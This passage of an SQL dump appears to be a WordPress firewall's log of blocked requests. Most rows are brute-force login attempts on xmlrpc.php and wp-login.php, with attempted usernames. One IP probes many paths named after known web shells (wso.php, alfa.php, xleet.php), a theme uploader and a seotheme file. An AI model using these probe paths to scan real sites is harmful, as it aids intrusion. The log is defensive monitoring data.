),('80.87.194.140',1347928716,'newd',0,1664538837.9536,152,'1VIyqsEjQUdfKZOn3WDALarb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.156.230',2994773222,'newd',0,1664539008.8994,152,'tSJ1MWhBUXjokzmGcRPpqry9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.81.214.91',3226588763,'newd',0,1664539413.5780,152,'8jKlZNVpOEQbSgPdU5FtLnJm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664539433.5983,55,'pE32SnByAH6uv1mcdZkOL7ef','','19|0|0|0|cteisys.com/wp-content/themes/cameleonthemeforest/includes/fileuploader/upload_handler.php',0,19,0),('185.33.54.15',3105961487,'newd',0,1664539582.9709,152,'EGr9XqLmeWfY0nQwvcA2VT7S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.45',90545197,'newd',0,1664539813.9807,152,'RrhHze2A38vFYGTEKNiykb0B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.138.120',267094648,'newd',0,1664540370.6203,152,'wm6EHsp07UBQzfujiX528ePW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.247.139.21',3120007957,'newd',0,1664540588.8963,152,'VKpy1u7c6qJ0jARn5tQ3HzxO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1664540736.0299,152,'qurGWAXhgabDpFN8OYEdQIzs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.114.235.167',1567812519,'newd',0,1664541115.5247,152,'q3o2CWhSBDPM1I4dnHk5RlbK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.143.236',1137545196,'newd',0,1664541314.0196,152,'yPjiuO0VlLTKF6cbWqxGv52S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.60.194',2160540866,'newd',0,1664541439.5097,152,'eXMasvTyoE7SPLVYZiG91ADB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'nathaniel-lipka',0,1664541570.9106,51,'OncRBaPEow9j6xe0TtzlySXr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.14.224.167',755949735,'newd',0,1664541644.1323,152,'jo4AylnO0IzBgZDW1LpPi7FS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1664541790.9271,152,'8xNBFMZgatKzhYQkv6piE9s5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.97.24',267084056,'newd',0,1664541962.6819,152,'boTqEXpUIOZAre86n7NuWlih','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1664542300.0037,152,'yMOVhza5nSdY0CGBQb7v4fHm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.126.140.17',2424212497,'newd',0,1664542422.9895,152,'0U4n6zks15vgaStrJhOXVEpf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.33.54.15',3105961487,'newd',0,1664542617.3892,152,'f9x30Mryb8cHFBSLP5aAh7s6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'newd',0,1664542720.4456,152,'OVxnDrUhXzWgSopLe8TMQREb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1664542926.7693,152,'p5ZjJqQedW2btk4BfHVl0nz9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1664543029.5336,152,'AfTeKZO9RUNuFxCJlbVoLhD5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.149.103.132',3583338372,'newd',0,1664543236.0561,152,'3LBdKv9IEXiN7qew8YfJWha6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1664543686.7381,152,'mbq7NhcGrDLMI1vtf3isdVoY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.187.24.159',633018527,'newd',0,1664543847.4500,152,'CiTZ9AfDEvLHIogedJyNmrWc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.193.197.89',599901529,'newd',0,1664543982.1407,152,'QcjqmlvfDCnKEZGiLz9xHyTw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.193.197.89',599901529,'newd',0,1664544440.9724,152,'5ZFCfUgLhJ2cR8E7NlrjYymH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.0.165.146',2583733650,'newd',0,1664544550.0162,152,'tcTshxiv2n80gzLYBF51CyjO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.201.110.199',3351867079,'newd',0,1664544732.6427,152,'L04HAu5QGcmU8Tb9St1Ysex2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664544865.6036,152,'xaer24GoiZpI53d1TNEX79CF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1664544910.8652,51,'13fUbSxEWpihFvKkDG2JeVol','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1664545050.1349,152,'5T2Y0qUAERBQOmybKh1L7tFC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.30.143',860823183,'newd',0,1664545186.0217,152,'gi0pvI87JdcBbYtw1es3L9Nk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.14.141.22',1779338518,'newd',0,1664545500.0227,152,'BcAnGk9txg6Wvsq7Q0EiS38b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1664545708.7894,152,'tQHo2z90LMCWOVfKlngb4jwG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1664545835.1579,152,'1UvrA9Kt2XgiCk5VcbMleOIW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.255.64.58',872366138,'newd',0,1664546077.7300,152,'lDFCO1n2p0wdKEfV8xtmXbo4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.17',1364735249,'newd',0,1664546189.2541,152,'rJ3WcjshVLbRv60IEeQUtZqo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.81.47',3324924207,'newd',0,1664546365.8151,152,'oxWhaPz9BeN1iJtFcnrylsMp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.246.208',2650142416,'newd',0,1664546884.9818,152,'Zo3jXdNTztmFUvsEYGfJynxk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.126.46',2733735470,'newd',0,1664547082.6266,152,'YDzIAfMyV80N9Q5PsimpXkc3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.38.40.215',3559270615,'newd',0,1664547221.5153,152,'se4cN1bxGuAOqktjYM2iovyF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.206.253.21',315555093,'newd',0,1664547428.2919,152,'NwAKBHyOxRdn2DIJ04fhvqFc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1664547578.1964,152,'VIQMEjDCW80aZ1vqiofbm5XG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.28',1868207644,'newd',0,1664547799.0903,152,'JOG8X0i4SzchH3dDQsZFbfAu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.137.20.41',763958313,'',0,1664548148.8345,55,'9tId6Knr7mB0eoE5qVuXiFSO','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1664548159.7474,55,'qZsiW30XD9hbVyopYHcfv64j','','19|0|0|0|cteisys.com/wp/wp-content/themes/seotheme/mar.php',0,19,0),('40.122.149.171',679122347,'newd',0,1664548162.4855,152,'YXhcHJFugj8qKpt5ynNm42CL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.137.20.41',763958313,'',0,1664548170.8604,55,'vwP4leb2KaZm1jOhqrFHnM9X','','19|0|0|0|cteisys.com/wordpress/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1664548179.3839,55,'eYTiGlv23QVb8anD0EyNUcf9','','19|0|0|0|cteisys.com/blog/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1664548190.4814,55,'w4B0K5mnWSUEhveJMjkXrAiP','','19|0|0|0|cteisys.com/site/wp-content/themes/seotheme/mar.php',0,19,0),('45.137.20.41',763958313,'',0,1664548190.4835,10,'w4B0K5mnWSUEhveJMjkXrAiP','','707|0|0|0|cteisys.com/site/wp-content/themes/seotheme/mar.php',0,707,0),('66.45.251.157',1110309789,'newd',0,1664548321.2160,152,'okE4hrtylu9nTdpAOeGPq8HM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664548545.7455,152,'t9CAklJjU3cOFN1Yun6vdbSz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'newd',0,1664548688.6236,152,'NOLuC59R4UHer8BFjtMkwf0T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.170.41',2673453609,'newd',0,1664548900.8142,152,'IJhfRb2YlTowcsj1HmKPgtVN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.25',90545433,'newd',0,1664549098.5732,152,'Xw08n3gpMIJt1hxkWve2fVAl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.228.6',1466622982,'newd',0,1664549460.8672,152,'ugQ4rY7KOsNCWImR5dvETayA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.216.162',2733693090,'newd',0,1664549700.4396,152,'JhHyxgW4r2fusVCnBtzTjvRP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1664549835.6212,152,'f8SMuXk7UD5oR2jO3pBZgIw9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.242.56.232',3270654184,'newd',0,1664550080.2789,152,'4Eb1GdPMfCScHiBYsDzIJvOW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'newd',0,1664550234.7969,152,'BSbChjL1w7TeROpZ9yvDrmQJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.229.214.93',786814557,'newd',0,1664550459.1924,152,'LdS3JPExKoQa6CqM8I2VgrT5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'nathaniel-lipka',0,1664550666.1570,51,'9zsD0JKcu2bdWmVrEOLQxBvF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664550801.4581,7,'z1mHNvG6Qqy2bEnfjWICsuow','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.183.204',392280012,'newd',0,1664550803.9475,7,'Iu0YWBSvzysZg4DcbXalUqQF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664550807.8761,7,'4E7vzWPIe8nC3UsT5a1DKjbR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('31.170.166.130',531277442,'newd',0,1664550809.8851,7,'nswcCoSkvTZ3WLGqJ9542KOd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('65.2.119.66',1090680642,'newd',0,1664550817.7173,7,'RAaUzWbhjIK0pHcO6FQXN2ti','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.107.113.246',3110826486,'newd',0,1664550821.4347,7,'5qye7TKArnIgZwukoFs6E39v','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.156.45.135',1385966983,'newd',0,1664550827.6905,7,'vO1VA0r6I5qCEx8azZbXptDn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.151.148.49',3516372017,'newd',0,1664550827.6945,7,'mMtClx2fbBrS1KnJF8cWOzTD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('50.59.99.98',842752866,'newd',0,1664550843.1619,152,'6mvcuyF5IpaP1Lz2jCqr7hwX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.222.243.149',1038021525,'newd',0,1664551247.5102,152,'kURnsqti5L2jIBr1uOo7ZNvy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.120.248',2733734136,'newd',0,1664551433.6389,152,'wkXJpWcrBARb6tvyPSZ2g5Y9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('79.143.85.14',1334793486,'newd',0,1664551674.1317,152,'hsopydEtuGcn1vFwSP4l3g7b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.224.85.64',316691776,'newd',0,1664552066.6832,152,'lmg3YFhBIxX6VQe82u4bycTd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1664552246.9249,152,'hEM4PAtQOFSNUkGgWb81Ryqe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1664552477.8266,152,'CALkEyVcvughzoTp1bmYliwd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1664552644.2766,152,'yOcUkHnhWSY0Lb46dipQwam3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.132.157',2310571165,'newd',0,1664552871.6737,152,'0ad9nL3IWVHtFmUv6xDhBK1i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.201.110.199',3351867079,'admin',0,1664553499.4819,152,'EkwDsbguOe3pKj57MVBmYNzR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.120.192',1732933824,'admin',0,1664553930.4660,152,'ClPJjqLwiGrbZ9XfWRDaIcBx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'admin',0,1664554107.4239,152,'jGz7hDSCNtpIbT6k2X0qrJEV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1664554338.9221,152,'3mljz2YxyBsoMSZkQfOLTJGH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.124.210.118',2994524790,'newd',0,1664554735.2585,152,'aM6SCjAzNYKxnUWZioEpF3cl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.87.194.140',1347928716,'newd',0,1664554952.6789,152,'Vgz48JDMdyvK971piENaA5Qx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.107.146',226388882,'newd',0,1664555192.2157,152,'mE9h1cLCKdBNg8ZqPpaJTnUI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664555319.7909,7,'bgCJZsPneAzGpMRu3d46UILf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.124.226.192',863822528,'newd',0,1664555320.2932,7,'EDMeb4c1PJrSsuofY26AIlNg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664555320.5696,7,'Sz1RNpGQoDJgU4FO6lMaxnsd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.40.177.68',2032709956,'newd',0,1664555326.8726,7,'i8qTVJrdmsCHUMPZ3FxAkDwn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('125.124.125.235',2105310699,'newd',0,1664555333.8105,7,'fj38Mb9vR5yLlGHwWdPINsgE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.17.172.162',772910242,'newd',0,1664555336.4691,7,'nyA0ZsrhTjH1bvmJpP9CI6a5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.180.158.189',2343870141,'newd',0,1664555341.0549,7,'1RypcMZB9Vibgw5uYzh4PdDO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664555344.9187,7,'yLn8BsK29olbGMwmi3daHuFq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.174.248.107',3652122731,'newd',0,1664555345.2401,152,'sfMhmK1DZR6BCOqEaW9tApei','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.207.63',2160578367,'newd',0,1664555352.7823,7,'UEsXkrnMLHKomWTpJhjwt4Av','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.86.229.13',576120077,'newd',0,1664555356.6229,7,'Zp6sjVO3lrCS0UMebNgyPvDn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('65.2.119.66',1090680642,'newd',0,1664555369.6215,7,'sduJ3GXPbL9xwhKoNFqetQZH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.14.89',1807552089,'nathaniel-lipka',0,1664555562.8371,51,'SbArENv0O1V6ITYl4u9WLUpo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1664555594.2564,152,'bmUeraMD2HLvGlTp61FwP84n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.180.157.5',2343869701,'newd',0,1664556203.6416,152,'dXb98fz6Le1mqTU4pDgBtVRi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'nathaniel-lipka',0,1664556342.8839,51,'lsTQ9Bk58JEwoM4dRYCqzUAr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.158.230.167',3634292391,'newd',0,1664556445.5792,152,'PTH2O0irbhBQUJaftAcmFGV6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.56.160.61',1731764285,'newd',0,1664556618.4598,152,'quKrXh02nkJ8RLSaGcEzwNsd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.74.17.225',793383393,'newd',0,1664556862.8009,152,'5L7cysaoFh2qYClUGm1Hwv9V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.209.117',2310590837,'newd',0,1664557777.0399,152,'dKOEIxekliBL4Gpv6sS3T10u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'newd',0,1664557941.3890,152,'VtJOdoTfsRhXW8BqA3DQ6aG5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664558107.1621,7,'uXTqEFScD2UNO0txGQ4wgVys','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('154.38.163.180',2586223540,'newd',0,1664558202.2289,152,'t9JAOiRcHyzevnP2Tf4glBLq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1664558656.3691,152,'S2akd7FYZfueWXVKMURHcw9C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.168.187',267102395,'newd',0,1664558866.6006,152,'rmgQUbeWNGxdzpoHcAEw3hFy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1664559131.5614,152,'OUdjtJ4w1WqfFYs80kP3h9rZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.52.130.41',3576988201,'newd',0,1664559306.2494,152,'hOY0iKwzCmuXyVg4Z2e56ctl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.124.210.118',2994524790,'newd',0,1664559562.7806,152,'arxBcNSgpvijDdRMLfkUYZyl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.250.252',3322739452,'newd',0,1664560000.4244,152,'2jKgCHGyNnME1IOQbelAukrq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'newd',0,1664560186.4083,152,'FuRTrtLIApc5M0nmqlNwovbg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.0.165.146',2583733650,'newd',0,1664560422.0318,152,'SgjnA3xyTzr6eYBLH8JXhQoC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.59.99.98',842752866,'newd',0,1664560635.5308,152,'Fhl9j8byxueTQCK3OVwIB07d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.222.243.149',1038021525,'newd',0,1664560853.2904,152,'MeJgQXdScv9ajwnt1zRsTqFm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1664561320.0131,152,'aYiUpxgVEulJZeFh2K3InByT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.23.254.254',1125646078,'newd',0,1664561520.4940,152,'7IkNV35EGRBcboM2PtguJhYj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.129.181.108',2508305772,'newd',0,1664561772.3665,152,'dOpPcMqzmne7Sa20h9F6Q8Lb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.228.6',1466622982,'newd',0,1664561949.5135,152,'lodHwScuC08XqeOxvtiZrNkm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.192.246.33',3569415713,'',0,1664561968.8343,55,'SvfuWgL2FCTbydhmJGz1rxlw','','19|0|0|0|cteisys.com/about.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561969.7016,55,'7w8BNdtnhvFlyHM9VRP3UeW4','','19|0|0|0|cteisys.com/upload.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561970.8851,55,'0OrxZc9fbadoITMAkK1SJwhU','','19|0|0|0|cteisys.com/2index.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561972.1235,55,'bXmRvNV780n3kHqKtge59JSL','','19|0|0|0|cteisys.com/C.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561973.3517,55,'oKjivB3OzPVCufFU6e5hlDwn','','19|0|0|0|cteisys.com/c.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561973.3544,10,'oKjivB3OzPVCufFU6e5hlDwn','','707|0|0|0|cteisys.com/c.php',0,707,0),('212.192.246.33',3569415713,'',0,1664561975.2907,55,'jE2mr9VFoPghDiO8NISZYwJq','','19|0|0|0|cteisys.com/01.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561976.6302,55,'gym1bjYAUcsMqF8xdGNCo7J6','','19|0|0|0|cteisys.com/1.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561977.6371,55,'szkOiGEcjt1lQUmLdyVYeApT','','19|0|0|0|cteisys.com/02.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561978.5102,55,'mTA8PbfBCqv2VKlnNRODxEp5','','19|0|0|0|cteisys.com/wp.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561979.3752,55,'DNcmCLa1zqSIKhf6yXxZ4kF8','','19|0|0|0|cteisys.com/fw.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561980.4023,55,'mQGYfS9gac5FukzsV2vMJI4t','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561981.3463,55,'uUDy0mM3kXTR4EZGtYr2F81n','','19|0|0|0|cteisys.com/mini.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561982.4599,55,'RVbKn5rLcwPYDIkmsOjEpq7x','','19|0|0|0|cteisys.com/x.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561983.6499,55,'gOiZQYeqTj4ltX8Cf3Jd6EWR','','19|0|0|0|cteisys.com/404.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561984.6223,55,'ShszP83Rb4eQL2E5Mno9mqgV','','19|0|0|0|cteisys.com/403.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561985.4963,55,'X2b0Lxn7SF4ri51djBvgsYGk','','19|0|0|0|cteisys.com/wso.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561986.4799,55,'yDT71kiqYLJx6H5pdznurelK','','19|0|0|0|cteisys.com/admin.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561987.6483,55,'QuiVs6mY5GLxfogJU8wp0drk','','19|0|0|0|cteisys.com/wp-22.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561988.6244,55,'9pTX7QSNjvhmHsgR3fGtYnWU','','19|0|0|0|cteisys.com/1index.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561989.6546,55,'QzkbTi72agC1joqFV8puLwHS','','19|0|0|0|cteisys.com/marijuana.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561990.6915,55,'sNnmbTpVCKo9YUxDQlLME74G','','19|0|0|0|cteisys.com/good.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561991.7670,55,'7in4fkUYyL0IDZprEo1JRlwt','','19|0|0|0|cteisys.com/up.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561992.8308,55,'gkL5BvMSFcdUETjuOZAPW4r2','','19|0|0|0|cteisys.com/doc.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561993.9386,55,'KBWvh2ikOGcaXF14MLzymDgA','','19|0|0|0|cteisys.com/wp.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561994.9108,55,'825QuvmcSVJh1XNWqrkZPRIo','','19|0|0|0|cteisys.com/radio.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561995.9100,55,'EBKrQNZexPA3ugIpotcajX6S','','19|0|0|0|cteisys.com/wp-includes/1index.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561996.7987,100,'udNicAo2JkhtKp6mT9nrw8vg','','13|0|0|0|cteisys.com/1index.php',0,13,0),('212.192.246.33',3569415713,'',0,1664561997.7631,55,'EYho9iTLOCKWFJGIgnpfyzUX','','19|0|0|0|cteisys.com/wp_wrong_datlib.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561998.7232,55,'zbRyFsP3JfQEHevYxT5h0ZU7','','19|0|0|0|cteisys.com/2index.php',0,19,0),('212.192.246.33',3569415713,'',0,1664561999.6312,55,'7dcUZt12FiGjRSM6p9mL3bNo','','19|0|0|0|cteisys.com/autoload_classmap.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562000.7834,55,'yZEBqRewDJ8CTgzIWLnNSO40','','19|0|0|0|cteisys.com/wp.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562001.6986,55,'M05xFC4skcSXoObn2pRaKNGA','','19|0|0|0|cteisys.com/wikindex.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562003.2262,55,'3lMyWUtX6zeAc4xoaC712VhE','','19|0|0|0|cteisys.com/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562004.3645,55,'bq3yVjsWPvR42NktlQpBewhi','','19|0|0|0|cteisys.com/wp-2019.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562005.3809,55,'HmGaYl1pizPfU87kg5K9jZIs','','19|0|0|0|cteisys.com/1h6j5.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562007.5014,55,'jY8BrgfM2eykGXQhHwxVaDF9','','19|0|0|0|cteisys.com/wp-admin/xleet.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562008.4375,55,'TNBxLmHPgpzIsvcK4eEaAjZt','','19|0|0|0|cteisys.com/wp-content/fw.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562009.5452,55,'yocvpeLwsg64AIEVZnh75PHb','','19|0|0|0|cteisys.com/wp-admin/fx.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562010.4238,55,'eHoBsqNmcWkV4jJv7xQwDGRL','','19|0|0|0|cteisys.com/4price.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562011.9506,55,'NSL3eViMEfz9cqosYxRB58tr','','19|0|0|0|cteisys.com/wp-info.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562013.0038,55,'mv0oqL7DhpBEXd1VbgIak5s6','','19|0|0|0|cteisys.com/utchiha.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562014.0368,55,'RJ0b3P95rm1LFEH67SCBeWIl','','19|0|0|0|cteisys.com/wp-admin/priv8.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562015.1640,55,'gB3InUyuWxqX20pVkFvRNrh1','','19|0|0|0|cteisys.com/wp-admin/rss.php',0,19,0),('212.192.246.33',3569415713,'',0,1664562016.1069,55,'uYWAanJEU2d1CXQM835PZtDk','','19|0|0|0|cteisys.com/uploads/xleet.php',0,19,0),('37.120.132.83',628655187,'joyce',0,1664562237.2292,152,'p7PkiJ8vFsAgab3dDIz0Lm25','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664562649.2400,152,'oP2MIp84LEvFtJ0yWOnzbl6U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.211.45.155',3285396891,'newd',0,1664562833.5778,152,'w5f7en9qdHKahPkbcj6AZO0V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.154.69.85',3097118037,'newd',0,1664563092.0971,152,'H9VJWSuhkaNfycP8dir20Isq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.104.66.61',795361853,'newd',0,1664563300.6522,152,'xylJiDLYztPdsKu2ROArU5WE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.74.42',3642051114,'newd',0,1664563338.0901,7,'Wb4uXy1OBALIGgsYZvc0NkVd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664563339.0051,7,'CpEyLOAu9kHQ0vqStrzX34ie','','0|0|0|0|cteisys.com/wp